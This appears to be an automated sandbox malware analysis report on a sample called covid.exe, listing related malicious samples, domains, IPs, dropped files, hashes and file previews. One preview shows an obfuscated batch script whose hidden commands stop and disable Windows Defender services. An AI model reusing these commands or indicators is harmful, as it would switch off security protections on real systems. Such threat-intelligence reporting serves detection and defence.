                        QUOTE.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9E65D4E4E8AEF8BD307A35D3BCE3AEEE.html
                        7789-2020.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3B326A21F43E9F3D00AC05CA57C8BA56.html
                        payment receipt.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BAD1D062871DD0CB1CFE768455005D62.html
                        QUOTE.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-97E0AB11BF622A9A31CDEFFB82113E1B.html
                        cLQd2QVOWu.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-DBBB4E10CBD7095142CF4698058E72A4.html
                        item list.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
                        Orders.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7AFD341D75B1C01FA414B8FBB3F4F2BC.html
                        w1YYpRG02e.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5B3D301DB51C9B00F70AF37938BE599F.html
                        ADJUNTOEXTRACTO590878174787097120989222355748.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9A964AADD659F0067F881ACA423BCEDD.html
                        Factura Serfinanza022880209777477966487010096.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1E6FC8A774533AA394D4580F6DB6838B.html
                        SERFINANZAEXTRACTO283816558547438357773985414.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9B31D021FF64B2D5D03885F5B17A0908.html
                        EXTRACTOSERFINANZA596054271198721911813685868.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09E94B6C5260416402DA47E86244BE30.html
                        Property Details.pdf.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F02CDE0F9BC55206FC1C6FD48DB295AB.html
                        Request for Price.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CA312B7AD325B7F976AFB06E92A5151A.html
                        Invoice & BACS Documen.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E09CECC00887731FA9705E28293E8864.html

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        mmwrlridbhmibnr.mlSecuriteInfo.com.Trojan.Siggen13.10233.30629.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        OFneOuyQDx.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        2U1aZi86Sw.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        8TkFgL94vo.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        List.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        QUOTE.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        7789-2020.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        NEW ORDER.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        URGENT_QUOTATION_PR # 270473. 20-04-2021.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        QUOTE.docGet hashmaliciousBrowse
                        • 104.21.86.143
                        payment receipt.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        QUOTE.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        VZL5ROpeId.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        cLQd2QVOWu.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        item list.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        Orders.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        FneJElVdDf.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        w1YYpRG02e.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        eh1CjskZCs.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        QSN0y9JNF1.exeGet hashmaliciousBrowse
                        • 104.21.86.143

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        CLOUDFLARENETUSAttachementHtm.htmlGet hashmaliciousBrowse
                        • 104.16.18.94
                        6xrXVxpiSm.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        zj4NVQ6TKa.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        VZshmdIfmC.exeGet hashmaliciousBrowse
                        • 172.67.188.154
                        7wiTGdPpvv.exeGet hashmaliciousBrowse
                        • 172.67.188.154
                        7Wv8cQT117.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        5PthEm83NG.exeGet hashmaliciousBrowse
                        • 172.67.161.4
                        SecuriteInfo.com.Trojan.Siggen13.10233.30629.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        VoicePlayback (0155) for umclune myumanitoba .htmlGet hashmaliciousBrowse
                        • 104.16.18.94
                        apr.20.confirmaci#U0e02n SWIFT.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        Notification_test.htmGet hashmaliciousBrowse
                        • 104.16.19.94
                        OFneOuyQDx.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        SecuriteInfo.com.Variant.Bulz.440290.18036.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        SecuriteInfo.com.Trojan.GenericKD.36741716.4036.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        SecuriteInfo.com.Trojan.GenericKD.36740349.3453.exeGet hashmaliciousBrowse
                        • 104.21.14.15
                        4QwdcKOvum.exeGet hashmaliciousBrowse
                        • 104.21.48.10
                        2U1aZi86Sw.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        8TkFgL94vo.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        List.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        Account Details.exeGet hashmaliciousBrowse
                        • 104.21.19.200

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe4EQNFqt5Nm.exeGet hashmaliciousBrowse
                          URGENT_QUOTATION_PR # 270473. 20-04-2021.exeGet hashmaliciousBrowse
                            NEW SUPPLIER FORM.exeGet hashmaliciousBrowse
                              payment slip in foldrs.exeGet hashmaliciousBrowse
                                Discharge - 10,500MT of ZN CONCS - Bukpyung.exeGet hashmaliciousBrowse
                                  2021190411466.exeGet hashmaliciousBrowse
                                    GxRBjQa5k0.exeGet hashmaliciousBrowse
                                      f1MdIMyl48.exeGet hashmaliciousBrowse
                                        exALRGzKKl.exeGet hashmaliciousBrowse
                                          BGUSVBJPtY.exeGet hashmaliciousBrowse
                                            Invoice & BACS Document.exeGet hashmaliciousBrowse
                                              XwpoNqWEJ2.exeGet hashmaliciousBrowse
                                                Request for Price.exeGet hashmaliciousBrowse
                                                  EARTH SUMMT#U2013MAR21-V01VC.exeGet hashmaliciousBrowse
                                                    EARTH SUMMTMAR21-V01VC.exeGet hashmaliciousBrowse
                                                      NEWURGENTORDER.exeGet hashmaliciousBrowse
                                                        Invoice & BACS Documen.exeGet hashmaliciousBrowse
                                                          MV. WINTER SUMMER.exeGet hashmaliciousBrowse
                                                            MV. MCL - 21.exeGet hashmaliciousBrowse
                                                              Require your Sales Ledger from 01-April-2020.exeGet hashmaliciousBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):58596
                                                                Entropy (8bit):7.995478615012125
                                                                Encrypted:true
                                                                SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                MD5:61A03D15CF62612F50B74867090DBE79
                                                                SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):3.089415833598504
                                                                Encrypted:false
                                                                SSDEEP:6:kKLlkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:WwTJrkPlE99SNxAhUe0ht
                                                                MD5:3DCFE99F8D6BBF8BAE4F47092C0C15A0
                                                                SHA1:1C1CBE4F2F25DA8ADC960617F127CA4221786A24
                                                                SHA-256:A8413472CF220270F3D50ECD3753AFA5096896C6457668C055E120944DE188B4
                                                                SHA-512:FF2A4B7DA2F7D98EB1FF5C5C5C1D7264C072DC6C352A62A425CCC116626B0886B5D817A87A92A0053D9F400FA2A4FC37188A933FAEB3092ABC7B2B2C39526B39
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: p...... ........bA]ts6..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\covid.exe.log
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):1220
                                                                Entropy (8bit):5.354495486938689
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4Ks2f84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4K+sXE4G1qE4j:MxHKXfviYHKhQnoPtHoxHhAHKzvGHK1d
                                                                MD5:3B495BE0A7E2A57ACC717A4A3DBBD1E8
                                                                SHA1:D91F0A7B70C6C55AADEBD64CBBA5831481D3D5ED
                                                                SHA-256:D499F90E7622879DCA8ADEC7068D9D8926F33FD6FE9CDA465A7189CA4F4E9A83
                                                                SHA-512:A3B7D7326AB1D827E03799CC3E1D79155D757D14C0ABA1E98B612C011629D589B7A85AF8292587F38A81E123AB2BA359D3D20CB0A70B77022B4FE0C2BE96C9AB
                                                                Malicious:true
                                                                Reputation:low
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):14734
                                                                Entropy (8bit):4.993014478972177
                                                                Encrypted:false
                                                                SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                MD5:8D5E194411E038C060288366D6766D3D
                                                                SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                Malicious:false
                                                                Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):22184
                                                                Entropy (8bit):5.603143783785762
                                                                Encrypted:false
                                                                SSDEEP:384:jtCDK0CcfWXs0JYYSBKnmultIo3D7Y9g9SJUeRa1BMrm7iSRV7yUoI64I+iGq:Dfp4Kmultp339Xehab9+
                                                                MD5:1EEC9310290AB90DC59FA655592CB564
                                                                SHA1:4EE4B16DEFC3D73F4B1712A8A64BEF9D83076A93
                                                                SHA-256:7529B20EB35160F759D52075E8D304EDB39AA55AF9CBB2CF8EECDDA5D93529CC
                                                                SHA-512:696AB9ABAD204E75F06C1EA3AC79A7BA0627DABF4070F2BB38C5DEDD35786142F8B83A5DB6654957AE632AE44CAF7552ECA090316EC5D3C8565BED153522BE41
                                                                Malicious:false
                                                                Preview: @...e...........c.........../. .........A............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91000
                                                                Entropy (8bit):6.241345766746317
                                                                Encrypted:false
                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: 4EQNFqt5Nm.exe, Detection: malicious, Browse
                                                                • Filename: URGENT_QUOTATION_PR # 270473. 20-04-2021.exe, Detection: malicious, Browse
                                                                • Filename: NEW SUPPLIER FORM.exe, Detection: malicious, Browse
                                                                • Filename: payment slip in foldrs.exe, Detection: malicious, Browse
                                                                • Filename: Discharge - 10,500MT of ZN CONCS - Bukpyung.exe, Detection: malicious, Browse
                                                                • Filename: 2021190411466.exe, Detection: malicious, Browse
                                                                • Filename: GxRBjQa5k0.exe, Detection: malicious, Browse
                                                                • Filename: f1MdIMyl48.exe, Detection: malicious, Browse
                                                                • Filename: exALRGzKKl.exe, Detection: malicious, Browse
                                                                • Filename: BGUSVBJPtY.exe, Detection: malicious, Browse
                                                                • Filename: Invoice & BACS Document.exe, Detection: malicious, Browse
                                                                • Filename: XwpoNqWEJ2.exe, Detection: malicious, Browse
                                                                • Filename: Request for Price.exe, Detection: malicious, Browse
                                                                • Filename: EARTH SUMMT#U2013MAR21-V01VC.exe, Detection: malicious, Browse
                                                                • Filename: EARTH SUMMTMAR21-V01VC.exe, Detection: malicious, Browse
                                                                • Filename: NEWURGENTORDER.exe, Detection: malicious, Browse
                                                                • Filename: Invoice & BACS Documen.exe, Detection: malicious, Browse
                                                                • Filename: MV. WINTER SUMMER.exe, Detection: malicious, Browse
                                                                • Filename: MV. MCL - 21.exe, Detection: malicious, Browse
                                                                • Filename: Require your Sales Ledger from 01-April-2020.exe, Detection: malicious, Browse
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8399
                                                                Entropy (8bit):4.665734428420432
                                                                Encrypted:false
                                                                SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                Malicious:false
                                                                Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91000
                                                                Entropy (8bit):6.241345766746317
                                                                Encrypted:false
                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfokoedf.q1p.ps1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smbn3d1y.f3r.psm1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tym2jct4.dby.psm1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xz5qrnxd.rfa.ps1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.YAHSjSYP.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.361307632295367
                                                                Encrypted:false
                                                                SSDEEP:96:BZ4x6qZN4dqDo1ZObCZ+6qZN4dqDo1ZZMyOyUyjZH6qZN4dqDo1ZuJyEyEyNZ+:sl6
                                                                MD5:B4B02164A6FA467E0AE696445D0B6B26
                                                                SHA1:513BEE9D426B22C7CADAB0C99DFCC402B808D470
                                                                SHA-256:3A0D47EEE921355FB29411527205FA13A7A7B7C40D4849007FB54EE75AAA9EF8
                                                                SHA-512:4993411E98C6724182B2EE4C222E867DA2642A06619B7F4C2E7BC0721CC9BE5EDB6DC9B6E1EACC62AB58C2F4DE5F5BAA7F02544E919E2D7B1F627479E7B3A56C
                                                                Malicious:false
